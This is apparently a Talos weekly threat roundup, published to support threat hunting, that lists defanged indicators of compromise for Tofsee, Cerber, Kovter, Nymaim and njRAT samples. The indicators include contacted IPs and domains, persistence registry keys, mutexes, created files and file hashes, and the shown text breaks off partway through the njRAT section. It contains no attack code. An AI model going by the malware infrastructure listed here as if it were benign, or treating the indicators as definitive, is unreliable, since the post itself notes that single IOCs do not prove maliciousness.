Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 19 and Feb. 26. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Packed.Tofsee-9833646-1 Packed Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Ransomware.Cerber-9833115-0 Ransomware Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, other file extensions are used.
Win.Ransomware.Kovter-9833136-1 Ransomware Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Malware.Nymaim-9833164-0 Malware Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Packed.njRAT-9833170-1 Packed njRAT, also known as Bladabindi, is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes and remotely turn on the victim's webcam and microphone. njRAT was developed by the Sparclyheason group. Some of the largest attacks using this malware date back to 2014.
Win.Packed.CoinMiner-9833198-1 Packed This malware installs and executes cryptocurrency mining software. You can read more about this kind of threat on our blog /blocking-cryptomining.
Win.Trojan.Remcos-9835338-1 Trojan Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros sent as attachments on malicious emails.
Win.Packed.Dridex-9833501-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Ursu-9833566-0 Trojan Ursu is a generic malware that has numerous functions. It contacts a C2 server and performs code injection in the address space of legitimate processes. Once Ursu infects a system, it looks to steal confidential information. This malware is commonly spread via email.

Threat Breakdown

Win.Packed.Tofsee-9833646-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 18 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
9
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
9
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
8
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\16000009 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\12000002 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\14000006 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\16000048 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\25000020 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\22000002 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\21000001 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\11000001 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813} 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\DESCRIPTION 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS 4
<HKLM>\BCD00000000\OBJECTS\{71A3C7FC-F751-4982-AEC1-E958357E6813}\ELEMENTS\12000004 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINMON 4
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINMON\SECURITY 4
MutexesOccurrences
Global\SetupLog 4
Global\WdsSetupLogInit 4
Global\h48yorbq6rm87zot 4
Global\ewzy5hgt3x5sof4v 4
Global\xmrigMUTEX31337 4
WininetConnectionMutex 4
Global\wpsSerMutex2 3
DNcyagdluDonKsuVmC 2
Global\52e0e5c1-7401-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]7 9
185[.]254[.]190[.]218 9
157[.]240[.]18[.]174 8
217[.]172[.]179[.]54 8
5[.]9[.]72[.]48 8
130[.]0[.]232[.]208 8
144[.]76[.]108[.]82 8
185[.]253[.]217[.]20 8
45[.]90[.]34[.]87 8
172[.]217[.]12[.]132 7
87[.]250[.]250[.]22 7
104[.]47[.]54[.]36 7
23[.]216[.]244[.]163 7
216[.]239[.]34[.]21 6
216[.]239[.]36[.]21 6
104[.]47[.]22[.]161 6
23[.]5[.]227[.]69 5
37[.]1[.]217[.]172 5
163[.]172[.]32[.]74 5
23[.]10[.]134[.]216 5
209[.]85[.]232[.]99 4
157[.]240[.]2[.]174 4
67[.]195[.]204[.]151 4
204[.]79[.]197[.]219 4
23[.]3[.]13[.]88 4

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]in-addr[.]arpa 9
microsoft-com[.]mail[.]protection[.]outlook[.]com 9
microsoft[.]com 9
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 8
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 8
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 8
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 8
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 8
www[.]amazon[.]com 8
www[.]instagram[.]com 8
schema[.]org 7
accounts[.]google[.]com 7
drive[.]google[.]com 7
mail[.]google[.]com 7
maps[.]google[.]com 7
market[.]yandex[.]ru 7
news[.]google[.]com 7
play[.]google[.]com 7
www[.]youtube[.]com 7
www[.]google[.]com 7
ctldl[.]windowsupdate[.]com 6
a767[.]dscg3[.]akamai[.]net 5
ip[.]pr-cy[.]hacklix[.]com 5
iv0001-npxs01001-00[.]auth[.]np[.]ac[.]playstation[.]net 5
work[.]a-poster[.]info 5

*See JSON for more IOCs

Files and or directories createdOccurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe 13
%SystemRoot%\SysWOW64\config\systemprofile 9
%SystemRoot%\SysWOW64\config\systemprofile:.repos 9
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 9
%System32%\config\systemprofile:.repos 9
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 5
%SystemRoot%\Logs\CBS\CBS.log 4
%SystemRoot%\rss 4
%SystemRoot%\rss\csrss.exe 4
%TEMP%\csrss 4
%TEMP%\csrss\dsefix.exe 4
%TEMP%\csrss\patch.exe 4
%System32%\drivers\Winmon.sys 4
%System32%\drivers\WinmonFS.sys 4
%System32%\drivers\WinmonProcessMonitor.sys 4
%TEMP%\Symbols 4
%TEMP%\Symbols\ntkrnlmp.pdb 4
%TEMP%\Symbols\ntkrnlmp.pdb\9E22A5947A15489895CE716436B45BE02 4
%TEMP%\Symbols\ntkrnlmp.pdb\9E22A5947A15489895CE716436B45BE02\download.error 4
%TEMP%\Symbols\pingme.txt 4
%TEMP%\Symbols\winload_prod.pdb 4
%TEMP%\Symbols\winload_prod.pdb\B7B16B17E078406E806A050C8BEE2E361 4
%TEMP%\Symbols\winload_prod.pdb\B7B16B17E078406E806A050C8BEE2E361\download.error 4
%TEMP%\dbghelp.dll 4
%TEMP%\symsrv.dll 4

*See JSON for more IOCs

File Hashes

1989d79448592be105ab6f1f234ea0af27c1e026aa432af52ef318796b0e8d58
23d38422d193586d40a773cea01e9b20ad2935d94f51e036b27b9c19e63b5fb4
360643ca70455c23e649632316369a4f5b78d4f31079bb62ac8e31f082678ee4
4d3739cee22be1965a27e0a93d86f9ec687da085bda0316bc2b3d5b91dab8c66
5a308309eba7e75ef942ca1b1fd3858d475cafa2cd7c579e3a3f49043ce14cc0
5e9e1276b69aafe7717457e61f37c671f10d539ed1844462de07604fd8e6f214
71987716ea01b25067278eab5961dd5e5cd8fb927a808d1799d25b41b12a5978
818c99fec2aa30a09921ccf803d9ea06a61e5ee7cb9fd08723496193913dfe86
94aa2b152bc6fcccef890e6171571098fc13b2f4bff3c6a266c5322bdcb5cb0e
a24e0b91c1cdb0c394ac924702a338aff81bcf2f1a043c277caea2f85cde91c1
b23fba78118e9face6efde8949e51525be2dce027352eeab823ebcac57cc92fe
ba4dec73b5fe31e0558314905aed00bedda81639cc86dcfb23397a610154d437
c69b9f88539107e056445c94a042726977728159b570f9a7bbda367e79a5dd8a
c85745a40df2c26178036737592f758834a02d9cd0d27b755e55576c808babed
d250bc1a48c31bc22668874060b6bb14cffe0141fd2d24dc91abccfdcef5525b
d2cc7925069b06a85f93854c5c187f006f3800b7d6d4437b62842562fc45ff4a
edbc8a3a4410e15b89475ee80910b7834483c99611ee06e8174aa47991ad91b1
eee1c88dfa7550f80af89e0eb151d63b42e39f688a1c0e0cbabcea9b05216e89

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Ransomware.Cerber-9833115-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: Run
10
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
Value Name: AutoRun
10
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} 10
<HKCU>\PRINTERS\DEFAULTS 10
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_01
10
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}
Value Name: Component_00
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wimserv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wimserv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ntkrnlpa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ntkrnlpa
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: TSTheme
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: TSTheme
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: eventvwr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: eventvwr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: fc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: at
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ReAgentc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: ReAgentc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: sdchange
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: sdchange
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: unlodctr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: unlodctr
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: WPDShextAutoplay
1
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 10
Frz_State 10
shell.{<random GUID>} 10
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
85[.]93[.]0[.]0/18 10
Files and or directories createdOccurrences
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2} 10
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\eventvwr.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\eventvwr.exe 1
%System32%\Tasks\wimserv 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\wimserv.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\wimserv.exe 1
%System32%\Tasks\eventvwr 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\sdchange.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\sdchange.exe 1
%System32%\Tasks\sdchange 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\at.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\at.exe 1
%System32%\Tasks\at 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\fc.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\fc.exe 1
%System32%\Tasks\fc 1
%System32%\Tasks\ntkrnlpa 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ntkrnlpa.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ntkrnlpa.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\unlodctr.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\unlodctr.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\TSTheme.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\TSTheme.exe 1
%System32%\Tasks\unlodctr 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ReAgentc.lnk 1

*See JSON for more IOCs

File Hashes

02b265f4d4743586c8d060f43dac872f617bea4211979e3c4de291a1fd2dbeab
1c0afc71808c9204a208791841e9f2fedf7a15f2d262d87cf270729d351e6a66
284dae8aa042a069dd0f8b3f2b802566e528bb28e7483c91e7fe414619807668
29e31b81930067f1ee57a9331217a21264c4717e15f272ae60de56451ae7f6b3
323e92297b154f1877a7f3980d18de98bc8e1fdfcd92339c3f706d0284abb522
53003b37fae55889b7a594122def69c18e0668999939586cbad9e1850ab684de
86530bf646068f707f799a8a5422e5e5468d18df117cf02cd9e8b5f69a22d163
8af81aeaf846f4a71085ed1abf063b8e8b4ff87b10805cdb703850954fd58cd4
a0b463ad143af62657991abed04c6e1e652aacd83597b1ffd1ccd601a761ef4a
ceec5ccdf87cd9d1a986798a26fdf602331ab552c0d12279e60d1984e503d2ee
e126e3d595ed5fb389aad77a378cbbff627875efccde879ceb2f69466a6338de

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Ransomware.Kovter-9833136-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 96f717b3
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 96f717b3
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 656f27d6
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 656f27d6
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 12
<HKCU>\SOFTWARE\3A91C13AB1 12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1 12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102
Value Name: CheckSetting
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104
Value Name: CheckSetting
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: ffcfae7b
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: ffcfae7b
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 78758f10
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 78758f10
12
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: c3ab6058
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: c3ab6058
12
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 8567f942
12
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: e7ec9eed
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 8567f942
12
<HKLM>\SOFTWARE\WOW6432NODE\3A91C13AB1
Value Name: 01b2a448
10
<HKCU>\SOFTWARE\3A91C13AB1
Value Name: 01b2a448
10
<HKLM>\SOFTWARE\WOW6432NODE\174127A8DFD6952D52 1
<HKLM>\SOFTWARE\WOW6432NODE\JHJONDY 1
MutexesOccurrences
EA4EC370D1E573DA 12
A83BAA13F950654C 12
Global\7A7146875A8CDE1E 12
B3E8F6F86CDD9D8B 12
563CCFFF6B36C3AB 11
2070A5364843D9D3 11
Global\B2A01B9EB1B404AD 11
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
39[.]41[.]74[.]205 1
77[.]202[.]113[.]6 1
89[.]101[.]88[.]42 1
97[.]20[.]114[.]223 1
62[.]28[.]76[.]51 1
88[.]141[.]17[.]182 1
137[.]198[.]55[.]19 1
21[.]156[.]102[.]3 1
158[.]15[.]118[.]150 1
12[.]58[.]62[.]253 1
137[.]235[.]50[.]180 1
82[.]91[.]169[.]186 1
196[.]148[.]247[.]198 1
105[.]69[.]77[.]222 1
114[.]126[.]180[.]231 1
151[.]145[.]81[.]78 1
23[.]244[.]235[.]167 1
130[.]245[.]123[.]90 1
164[.]226[.]36[.]205 1
171[.]174[.]77[.]112 1
191[.]8[.]153[.]111 1
63[.]31[.]92[.]80 1
160[.]37[.]10[.]183 1
51[.]25[.]1[.]206 1
142[.]154[.]222[.]111 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
www[.]baidu[.]com 1
www[.]wshifen[.]com 1
cp[.]aliyun[.]com 1
netcn[.]console[.]aliyun[.]com 1
www[.]altn[.]com 1
jordandevolder[.]freeboxos[.]fr 1

File Hashes

05a177654f44ee39d7b1ff4dad3ba33ab486d49a958a3d472e0c135692d725da
29e136e598502f9e97562e922ef3b229e5853398c73fd8520afd61e816368543
4647c95a77f8dd9ee11e19fc7acd6bbf7d0e2d28a4cc5567f303b41302a57ab8
48d95eb09f9056d00be35f7971ecc98df7ea73ed60afaf83b1985f3033154b20
808e091ab01acfaa9e3b06eb71cea6ee080bfa341e6bccaa6e279c9256fe87cc
81f0391485f1fb1f01ae93b273afba5ad96453cabc5e3b76de2263896b093974
8deb937eb197eb8de2075272b4337e5f211cb0f175d84b938b9a3e532de25218
b29bf4f0b5db1ac2e5c3ea5876054cb46695c10ba0dbfbb2243adf1799cd9f49
e07241141e556c7b56f792c8956b171dd74c462593d9c64b937bb6382427f88c
e56419521157bd1339e2e002d9a1d265d85676196960cd03abc9234e0fd93025
ebf58d601873b6d4ca516bf6a607f7cd6edf6074e4be0677c89aa941beb16992
ec973dc07054ca2d243b516dde72172d162726f517c5c4f837ca6a72eeb2230d

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Nymaim-9833164-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK 23
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
23
MutexesOccurrences
Local\{0CCE1A6D-10E1-4330-6D33-59F9418C9024} 23
Local\{1181F583-B634-69BF-E703-D4756599024F} 23
Local\{180BBEAD-0447-044A-68BD-247EB6D0E352} 23
Local\{18DD7903-1E96-FEAF-92BF-014008A1248C} 23
Local\{65E26329-DE88-D536-CB3A-203091D3DF68} 23
Local\{92502033-C012-7F46-D6A8-0AC972DF6662} 23
Local\{25754F3F-7A37-56CA-31BB-3C9D33DA226B} 23
Local\{8B75523D-CAF4-D06B-A2AD-13EEF593AC52} 23
Local\{D2CC4CCA-CB77-CF10-8293-17C78DEC853F} 23
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
microsoft[.]com 23
google[.]com 23
dcrrkfcuq[.]pw 22
djvxzgguj[.]pw 22
hbomnx[.]net 22
hhqpe[.]in 22
jimnouitvsah[.]in 22
nkguoc[.]pw 22
onjytulzjho[.]net 22
qfdhb[.]com 22
qkolgzehfwc[.]com 22
swhuuebusn[.]pw 22
tqlwoqyjxwhx[.]in 22
usqkmt[.]net 22
vqncbn[.]in 22
xnqtr[.]com 22
ykdkhdytpcs[.]net 22
aiudzabvzp[.]in 1
bkyktgi[.]in 1
ccaqofkyvpz[.]net 1
eciimwrswhwq[.]pw 1
ecuhmpuhdoff[.]net 1
emvqxhipzz[.]net 1
ljcafafzcz[.]net 1
mlgpku[.]pw 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%ProgramData%\ph 23
%ProgramData%\ph\fktiipx.ftf 23
%TEMP%\gocf.ksv 23
%ProgramData%\jzk\icolry.ylg 23
%TEMP%\qnvgtx.eww 23
%ProgramData%\<random, matching '[a-z0-9]{3,7}'> 23
%APPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%LOCALAPPDATA%\<random, matching '[a-z0-9]{3,7}'> 23
%LOCALAPPDATA%\8w9 10
%APPDATA%\akwr35 10
%ProgramData%\5ltk 10

File Hashes

027eb50a323c9a64411fa32ed72eb0a9cbefb7f0a7a7c91072c5167768543bee
0d407e709625354e5061de9ae8d8f7d3a6de00335d2d2958e8810c7ebc298231
17cf7375748d5b3279643a920833f0802362698e3a3f86ecdd4c647f6becd962
29486237a4a0ae9fbaa7818ab21976338fd8e60b8cccdf5a6ed5e2a9361a2a2c
4aa98e131fe70965a8d8ab4ad09d496b69df33ce002c118836b05b568f34de62
5be2fc4c8d59abddd487be30063798bd4c5f13a9a5053b79faf585c60625be80
5bec3cc7247f29d33baf13e50235787440c23f7a85a8ea39742a304b6f6e42e2
69a26a27120e7a19d7a2de970cf2f03708748808e31fcc58165efe42f0cb6cb1
6a952db179e898736f289a945027169d7f37aefe6301ed68820fc502e4b2acbc
70c77ba9ffd9be299a806dd76e48ee2b07282c2d289b22e3d93c36228d50a85a
82b42e4fe14922995be5e3c428c6472d2ce8195cb299f80804f86da0cca32e4f
917d92b3abe443d5a30d8580c8a3f05ead1310dab993507c93f5b6f562283b5e
96755cfa43314ea56aca17a7d626f2275244e508d79465a3955484dd14f23634
9865853b7b72f281ce7d42970db23926395cfe246eaff9839fcde8c542497ecf
ae181cf422359fd0f829ea1e7421557a47fbe7c2ce2b0e1c2cc5b7313914470b
e0b2a87a77ad32ded7b8ca5f2ae3c7195bded9e525f4feb91f8e0c1b5bfa5522
e1bd68b699bd216423adebd9df3f586cceca8f90407a633f68a21f05068ffb7c
e236c9c2873df64284a4eae81c94a4f7de632c31236352f1e2fae4ca4a3d3fd7
e34b945244705711e8db253bc49969b00426dd61408bd0d48c6527e23249b7c8
e73bfb970fbfbe2ee525a381fe297353db86e28a646eb49ed5eda67e422495a6
eb61100dd1555b46a0ffa05035231ff61c85292c327659f9a2c86db715c10d2a
f515ddedac2d22db20265173cf39be8f486ce7fc2982c85b1b2e8d0bdf31823e
faec5be0de3f61425f674be3fb0a1f46e6a03ade19bffd26959912b6407d9aae

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.njRAT-9833170-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry KeysOccurrences
<HKCU>\ENVIRONMENT
Value Name: SEE_MASK_NOZONECHECKS
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: ParseAutoexec
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ba4c12bee3027d94da5c81db2d196bfd
4
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ba4c12bee3027d94da5c81db2d196bfd
4
<HKCU>\SOFTWARE\BA4C12BEE3027D94DA5C81DB2D196BFD
Value Name: US
4
<HKCU>\SOFTWARE\BA4C12BEE3027D94DA5C81DB2D196BFD 4
<HKCU>\SOFTWARE\772D3E1CF411932582BA4607CAF9D2F7
Value Name: US
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 772d3e1cf411932582ba4607caf9d2f7
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: 772d3e1cf411932582ba4607caf9d2f7
2
<HKCU>\SOFTWARE\772D3E1CF411932582BA4607CAF9D2F7 2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e101a39ab5de59589562aa0ff3295ba5
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: e101a39ab5de59589562aa0ff3295ba5
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: babe8364d0b44de2ea6e4bcccd70281e
1
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: babe8364d0b44de2ea6e4bcccd70281e
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\OPENWITHLIST 1
